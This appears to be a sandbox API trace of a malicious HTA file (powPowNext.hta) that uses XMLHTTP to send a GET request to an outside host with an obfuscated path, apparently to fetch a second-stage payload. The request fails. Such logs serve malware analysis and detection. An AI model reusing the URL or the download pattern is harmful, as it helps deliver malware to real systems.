riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x198ad4 | out: ppvObject=0x198ad4*=0x609dbc) returned 0x0 [0136.035] IUnknown:Release (This=0x609dbc) returned 0x8 [0136.035] IUnknown:AddRef (This=0x609dbc) returned 0x9 [0136.035] CreateUri (in: pwzURI="file:///C:/Users/Public/powPowNext.hta", dwFlags=0x2ba5, dwReserved=0x0, ppURI=0x198b84 | out: ppURI=0x198b84*=0x68e9dc) returned 0x0 [0136.035] IUnknown:Release (This=0x609dbc) returned 0x8 [0136.036] IUnknown:QueryInterface (in: This=0x68e9dc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x198b64 | out: ppvObject=0x198b64*=0x68e9dc) returned 0x0 [0136.036] IUnknown:Release (This=0x68e9dc) returned 0x3 [0136.036] IUnknown:AddRef (This=0x68e9dc) returned 0x4 [0136.036] IUnknown:Release (This=0x68e9dc) returned 0x3 [0136.036] IUnknown:Release (This=0x609dbc) returned 0x7 [0136.036] IUnknown:Release (This=0x68e9dc) returned 0x2 [0136.036] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x3 [0136.036] IUnknown:Release (This=0xcf83c0) returned 0x0 [0136.036] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x65a66c00*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x198c38 | out: ppvObject=0x198c38*=0x0) returned 0x80004002 [0136.036] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x65a66608*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x198c28 | out: ppvObject=0x198c28*=0x0) returned 0x80004002 [0136.036] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x65a69964*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x198c3c | out: ppvObject=0x198c3c*=0xc1a6d8) returned 0x0 [0136.037] XMLHTTP:IServiceProvider:QueryService (in: This=0xc1a6d8, guidService=0x65a6b1f4*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x65a66d80*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x198c2c | out: ppvObject=0x198c2c*=0x0) returned 0x80004002 [0136.037] GetCurrentThreadId () returned 0xb48 [0136.037] GetCurrentThreadId () returned 0xb48 [0136.037] GetCurrentThreadId () returned 0xb48 [0136.037] XMLHTTP:IServiceProvider:QueryService (in: This=0xc1a6d8, guidService=0x65a69944*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x65a66c00*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x198c38 | out: ppvObject=0x198c38*=0x0) returned 0x80004002 [0136.037] GetCurrentThreadId () returned 0xb48 [0136.037] GetCurrentThreadId () returned 0xb48 [0136.039] GetCurrentThreadId () returned 0xb48 [0136.039] XMLHTTP:IServiceProvider:QueryService (in: This=0xc1a6d8, guidService=0x65a6b1d4*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x65a6b1e4*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x198c30 | out: ppvObject=0x198c30*=0xcf83c0) returned 0x0 [0136.040] GetCurrentThreadId () returned 0xb48 [0136.040] GetCurrentThreadId () returned 0xb48 [0136.040] GetCurrentThreadId () returned 0xb48 [0136.040] IHTMLDocument2:get_url (in: This=0xcf83c0, p=0x198c40 | out: p=0x198c40*="file://C:\\Users\\Public\\powPowNext.hta") returned 0x0 [0136.040] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0136.040] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x604dd8 [0136.040] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604dd8 | out: hHeap=0x5e0000) returned 1 [0136.040] IUnknown:AddRef (This=0x609dbc) returned 0x9 [0136.040] IUnknown:Release (This=0x609dbc) returned 0x8 [0136.040] IUri:GetScheme (in: This=0x609dbc, pdwScheme=0x198bb4 | out: pdwScheme=0x198bb4*=0x9) returned 0x0 [0136.040] IUnknown:QueryInterface (in: This=0x609dbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x198b88 | out: ppvObject=0x198b88*=0x609dbc) returned 0x0 [0136.041] IUnknown:Release (This=0x609dbc) returned 0x8 [0136.041] IUnknown:QueryInterface (in: This=0x609dbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x198b24 | out: ppvObject=0x198b24*=0x609dbc) returned 0x0 [0136.041] IUnknown:Release (This=0x609dbc) returned 0x8 [0136.041] IUnknown:AddRef (This=0x609dbc) returned 0x9 [0136.041] CreateUri (in: pwzURI="file:///C:/Users/Public/powPowNext.hta", dwFlags=0x2ba5, dwReserved=0x0, ppURI=0x198bd4 | out: ppURI=0x198bd4*=0x68e9dc) returned 0x0 [0136.041] IUnknown:Release (This=0x609dbc) returned 0x8 [0136.042] IUnknown:QueryInterface (in: This=0x68e9dc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x198bb4 | out: ppvObject=0x198bb4*=0x68e9dc) returned 0x0 [0136.042] IUnknown:Release (This=0x68e9dc) returned 0x3 [0136.042] IUnknown:AddRef (This=0x68e9dc) returned 0x4 [0136.042] IUnknown:Release (This=0x68e9dc) returned 0x3 [0136.042] IUnknown:Release (This=0x609dbc) returned 0x7 [0136.042] IUnknown:Release (This=0x68e9dc) returned 0x2 [0136.042] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x3 [0136.042] IUnknown:Release (This=0xcf83c0) returned 0x0 [0136.042] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x2 [0136.042] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x65a69964*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x199ccc | out: ppvObject=0x199ccc*=0xc1a6d8) returned 0x0 [0136.042] XMLHTTP:IServiceProvider:QueryService (in: This=0xc1a6d8, guidService=0x65a69944*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x65a69944*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x199cd0 | out: ppvObject=0x199cd0*=0xcf83c0) returned 0x0 [0136.042] GetCurrentThreadId () returned 0xb48 [0136.042] GetCurrentThreadId () returned 0xb48 [0136.042] GetCurrentThreadId () returned 0xb48 [0136.043] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x2 [0136.043] IUnknown:AddRef (This=0xcf83c0) returned 0x2 [0136.043] IUnknown:Release (This=0xcf83c0) returned 0x1 [0136.043] XMLHTTP:IUnknown:QueryInterface (in: This=0x9633980, riid=0x6c9ca8cc*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x199db4 | out: ppvObject=0x199db4*=0x9633960) returned 0x0 [0136.043] XMLHTTP:IUnknown:QueryInterface (in: This=0x9633960, riid=0x6c9d12c0*(Data1=0xa731980e, Data2=0x7d1e, Data3=0x4652, Data4=([0]=0x84, [1]=0x32, [2]=0xad, [3]=0x2b, [4]=0x3b, [5]=0xc0, [6]=0xea, [7]=0x44)), ppvObject=0x199d64 | out: ppvObject=0x199d64*=0x0) returned 0x80004002 [0136.043] XMLHTTP:IUnknown:QueryInterface (in: This=0x9633960, riid=0x6c9d1b58*(Data1=0x626fc520, Data2=0xa41e, Data3=0x11cf, Data4=([0]=0xa7, [1]=0x31, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x8, [6]=0x26, [7]=0x37)), ppvObject=0x199d44 | out: ppvObject=0x199d44*=0x0) returned 0x80004002 [0136.043] XMLHTTP:IUnknown:QueryInterface (in: This=0x9633960, riid=0x6c9d1b48*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x199d4c | out: ppvObject=0x199d4c*=0x0) returned 0x80004002 [0136.043] XMLHTTP:IUnknown:QueryInterface (in: This=0x9633960, riid=0x6c9ca8bc*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x7410350 | out: ppvObject=0x7410350*=0x0) returned 0x80004002 [0136.044] XMLHTTP:IUnknown:AddRef (This=0x9633960) returned 0x4 [0136.044] XMLHTTP:IUnknown:Release (This=0x96339a4) returned 0x3 [0136.044] XMLHTTP:IUnknown:Release (This=0x9633960) returned 0x2 [0136.044] XMLHTTP:IUnknown:Release (This=0x9633980) returned 0x1 [0136.045] XMLHTTP:IDispatch:GetIDsOfNames (in: This=0x9633960, riid=0x6c9c9164*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x199d9c*="open", cNames=0x1, lcid=0x409, rgDispId=0x199e00 | out: rgDispId=0x199e00*=1) returned 0x0 [0136.045] XMLHTTP:IUnknown:QueryInterface (in: This=0x9633960, riid=0x6c9ca8bc*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x7410390 | out: ppvObject=0x7410390*=0x0) returned 0x80004002 [0136.045] XMLHTTP:IUnknown:AddRef (This=0x9633960) returned 0x2 [0136.045] XMLHTTP:IUnknown:QueryInterface (in: This=0x9633960, riid=0x6c9ca8dc*(Data1=0xebade2e2, Data2=0xa8cc, Data3=0x4797, Data4=([0]=0xa4, [1]=0x30, [2]=0x2e, [3]=0x86, [4]=0x38, [5]=0x67, [6]=0xef, [7]=0xd0)), ppvObject=0x199e44 | out: ppvObject=0x199e44*=0x0) returned 0x80004002 [0136.045] XMLHTTP:IUnknown:AddRef (This=0x9633960) returned 0x3 [0136.049] XMLHTTP:IDispatch:Invoke (in: This=0x9633960, dispIdMember=1, riid=0x6c9c9164*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x199e18*(rgvarg=([0]=0x199d80*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x199d90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS", varVal2=0x0), [2]=0x199da0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="GET", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x199dc8, puArgErr=0x199d2c | out: pDispParams=0x199e18*(rgvarg=([0]=0x199d80*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x199d90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS", varVal2=0x0), [2]=0x199da0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="GET", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x199dc8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x199d2c*=0x9536eb0) returned 0x0 [0136.335] XMLHTTP:IUnknown:Release (This=0x9633960) returned 0x2 [0136.336] XMLHTTP:IDispatch:GetIDsOfNames (in: This=0x9633960, riid=0x6c9c9164*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x199d9c*="send", cNames=0x1, lcid=0x409, rgDispId=0x199e00 | out: rgDispId=0x199e00*=5) returned 0x0 [0136.336] XMLHTTP:IUnknown:QueryInterface (in: This=0x9633960, riid=0x6c9ca8bc*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x74103b0 | out: ppvObject=0x74103b0*=0x0) returned 0x80004002 [0136.336] XMLHTTP:IUnknown:AddRef (This=0x9633960) returned 0x3 [0136.336] XMLHTTP:IUnknown:QueryInterface (in: This=0x9633960, riid=0x6c9ca8dc*(Data1=0xebade2e2, Data2=0xa8cc, Data3=0x4797, Data4=([0]=0xa4, [1]=0x30, [2]=0x2e, [3]=0x86, [4]=0x38, [5]=0x67, [6]=0xef, [7]=0xd0)), ppvObject=0x199e94 | out: ppvObject=0x199e94*=0x0) returned 0x80004002 [0136.336] XMLHTTP:IUnknown:AddRef (This=0x9633960) returned 0x4 [0136.336] XMLHTTP:IDispatch:Invoke (in: This=0x9633960, dispIdMember=5, riid=0x6c9c9164*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x199e68*(rgvarg=0x199e00, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x199e4c, pExcepInfo=0x199e18, puArgErr=0x199dac | out: pDispParams=0x199e68*(rgvarg=0x199e00, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x199e4c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pExcepInfo=0x199e18*(wCode=0x0, wReserved=0x0, bstrSource="msxml3.dll", bstrDescription="The system cannot locate the resource specified.\r\n", bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x800c0005), puArgErr=0x199dac*=0xbfeb90) returned 0x80020009 [0136.353] XMLHTTP:IUnknown:AddRef (This=0xc1a6d8) returned 0x2 [0136.353] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x65a69964*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x19958c | out: ppvObject=0x19958c*=0xc1a6d8) returned 0x0 [0136.353] XMLHTTP:IServiceProvider:QueryService (in: This=0xc1a6d8, guidService=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x6bc914 | out: ppvObject=0x6bc914*=0x0) returned 0x80004002 [0136.354] GetCurrentThreadId () returned 0xb48 [0136.354] GetCurrentThreadId () returned 0xb48 [0136.354] GetCurrentThreadId () returned 0xb48 [0136.354] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x2 [0136.354] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x1 [0136.355] IUnknown:AddRef (This=0xcf83c0) returned 0x2 [0136.355] IUnknown:Release (This=0xcf83c0) returned 0x1 [0136.355] XMLHTTP:IUnknown:AddRef (This=0xc1a6d8) returned 0x2 [0136.355] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x65a69964*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x199474 | out: ppvObject=0x199474*=0xc1a6d8) returned 0x0 [0136.355] XMLHTTP:IServiceProvider:QueryService (in: This=0xc1a6d8, guidService=0x703b7344*(Data1=0xaf0ff408, Data2=0x129d, Data3=0x4b20, Data4=([0]=0x91, [1]=0xf0, [2]=0x2, [3]=0xbd, [4]=0x23, [5]=0xd8, [6]=0x83, [7]=0x52)), riid=0x703b7344*(Data1=0xaf0ff408, Data2=0x129d, Data3=0x4b20, Data4=([0]=0x91, [1]=0xf0, [2]=0x2, [3]=0xbd, [4]=0x23, [5]=0xd8, [6]=0x83, [7]=0x52)), ppvObject=0x199570 | out: ppvObject=0x199570*=0x0) returned 0x80004002 [0136.355] GetCurrentThreadId () returned 0xb48 [0136.355] GetCurrentThreadId () returned 0xb48 [0136.355] GetCurrentThreadId () returned 0xb48 [0136.355] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x2 [0136.355] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x1 [0136.570] XMLHTTP:IUnknown:AddRef (This=0xc1a6d8) returned 0x2 [0136.570] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x65a69964*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x198bb0 | out: ppvObject=0x198bb0*=0xc1a6d8) returned 0x0 [0136.570] XMLHTTP:IServiceProvider:QueryService (in: This=0xc1a6d8, guidService=0x703b4c68*(Data1=0x79eac9c1, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x703b34c0*(Data1=0x79eac9c1, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x198c7c | out: ppvObject=0x198c7c*=0x0) returned 0x80004002 [0136.570] GetCurrentThreadId () returned 0xb48 [0136.570] GetCurrentThreadId () returned 0xb48 [0136.570] GetCurrentThreadId () returned 0xb48 [0136.570] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x2 [0136.570] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x1 [0136.571] XMLHTTP:IUnknown:AddRef (This=0xc1a6d8) returned 0x2 [0136.571] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x65a69964*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x198970 | out: ppvObject=0x198970*=0xc1a6d8) returned 0x0 [0136.571] XMLHTTP:IServiceProvider:QueryService (in: This=0xc1a6d8, guidService=0x703b4968*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x703b4968*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x198a68 | out: ppvObject=0x198a68*=0x0) returned 0x80004002 [0136.571] GetCurrentThreadId () returned 0xb48 [0136.571] GetCurrentThreadId () returned 0xb48 [0136.571] GetCurrentThreadId () returned 0xb48 [0136.571] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x2 [0136.572] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x1 [0136.576] XMLHTTP:IUnknown:AddRef (This=0xc1a6d8) returned 0x2 [0136.576] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x65a69964*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x198b98 | out: ppvObject=0x198b98*=0xc1a6d8) returned 0x0 [0136.576] XMLHTTP:IServiceProvider:QueryService (in: This=0xc1a6d8, guidService=0x703b4958*(Data1=0x79eac9d5, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x703b4958*(Data1=0x79eac9d5, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x198ca8 | out: ppvObject=0x198ca8*=0xcf8930) returned 0x0 [0136.576] GetCurrentThreadId () returned 0xb48 [0136.576] GetCurrentThreadId () returned 0xb48 [0136.576] GetCurrentThreadId () returned 0xb48 [0136.576] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x2 [0136.576] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x1 [0136.576] IInternetHostSecurityManager:GetSecurityId (in: This=0xcf8930, pbSecurityId=0x703b3244, pcbSecurityId=0x198c98*=0x1, dwReserved=0x703e4e00*=0x8b55ff8b | out: pbSecurityId=0x703b3244*=0xd5, pcbSecurityId=0x198c98*=0x103ba) returned 0x0 [0136.576] CoCreateInstance (in: rclsid=0x6d6fad2c*(Data1=0xe569bde7, Data2=0xa8dc, Data3=0x47f3, Data4=([0]=0x89, [1]=0x3f, [2]=0xfd, [3]=0x2b, [4]=0x31, [5]=0xb3, [6]=0xee, [7]=0xfd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d6fad3c*(Data1=0xe66a412d, Data2=0x14b3, Data3=0x425c, Data4=([0]=0x82, [1]=0xac, [2]=0x5b, [3]=0x77, [4]=0x16, [5]=0xcc, [6]=0xa5, [7]=0xa7)), ppv=0x198c3c | out: ppv=0x198c3c*=0x6b66c8) returned 0x0 [0136.880] IUnknown:Release (This=0x6b66c8) returned 0x0 [0136.880] IUnknown:Release (This=0xcf8930) returned 0x0 [0158.783] XMLHTTP:IUnknown:Release (This=0x9633960) returned 0x3 [0158.783] SysStringLen (param_1="The system cannot locate the resource specified.\r\n") returned 0x32 [0158.783] wcscpy_s (in: _Destination=0x73621c0, _SizeInWords=0x33, _Source="The system cannot locate the resource specified.\r\n" | out: _Destination="The system cannot locate the resource specified.\r\n") returned 0x0 [0158.787] free (_Block=0x0) [0158.787] _CxxThrowException () [0158.797] _CxxThrowException () [0158.800] GetUserDefaultLCID () returned 0x409 [0158.801] GetVersionExW (in: lpVersionInformation=0x198950*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x199b68, dwMinorVersion=0x1989e0, dwBuildNumber=0x199b20, dwPlatformId=0x772c3482, szCSDVersion="觠\x19烜眭㒰眬訰\x19") | out: lpVersionInformation=0x198950*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0158.801] FindResourceExW (hModule=0x6c9c0000, lpType=0x6, lpName=0x101, wLanguage=0x0) returned 0x7302268 [0158.802] LoadResource (hModule=0x6c9c0000, hResInfo=0x7302268) returned 0x7303f20 [0158.802] LockResource (hResData=0x7303f20) returned 0x7303f20 [0158.802] SizeofResource (hModule=0x6c9c0000, hResInfo=0x7302268) returned 0xb2 [0158.803] GetCurrentThreadId () returned 0xb48 [0158.803] GetCurrentThreadId () returned 0xb48 [0158.808] _CxxThrowException () [0158.809] _CxxThrowException () [0158.809] GetCurrentThreadId () returned 0xb48 [0158.810] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x65423832, dwHighDateTime=0x1d7d80b)) [0158.810] GetTickCount () returned 0x1d72609 [0158.810] GetTickCount () returned 0x1d72609 [0158.810] SetEvent (hEvent=0x388) returned 1 [0158.811] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x65425f33, dwHighDateTime=0x1d7d80b)) [0158.811] GetTickCount () returned 0x1d72609 [0158.811] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x65425f33, dwHighDateTime=0x1d7d80b)) [0158.811] GetUserDefaultLCID () returned 0x409 [0158.811] FindResourceExW (hModule=0x6c9c0000, lpType=0x6, lpName=0x101, wLanguage=0x0) returned 0x7302268 [0158.811] LoadResource (hModule=0x6c9c0000, hResInfo=0x7302268) returned 0x7303f20 [0158.811] LockResource (hResData=0x7303f20) returned 0x7303f20 [0158.811] SizeofResource (hModule=0x6c9c0000, hResInfo=0x7302268) returned 0xb2 [0158.811] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x6542733a, dwHighDateTime=0x1d7d80b)) [0158.811] GetTickCount () returned 0x1d72609 [0158.812] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x654285db, dwHighDateTime=0x1d7d80b)) [0158.812] GetCurrentThreadId () returned 0xb48 [0158.812] GetCurrentThreadId () returned 0xb48 [0158.812] GetCurrentThreadId () returned 0xb48 [0158.812] GetCurrentThreadId () returned 0xb48 [0158.812] GetCurrentThreadId () returned 0xb48 [0158.813] malloc (_Size=0x88) returned 0xc4faf8 [0158.813] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x6542c075, dwHighDateTime=0x1d7d80b)) [0158.813] GetTickCount () returned 0x1d72609 [0158.813] 